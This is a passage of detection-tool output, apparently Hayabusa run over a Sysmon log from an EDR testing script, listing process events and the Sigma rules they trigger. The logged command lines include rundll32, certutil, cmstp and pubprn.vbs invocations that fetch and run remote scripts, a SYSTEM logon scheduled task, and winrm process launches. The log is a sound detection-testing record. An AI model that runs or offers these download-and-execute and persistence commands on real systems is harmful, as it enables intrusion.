747F3D96-664D-5D3F-0000-0010BB5D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,../hayabusa-rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 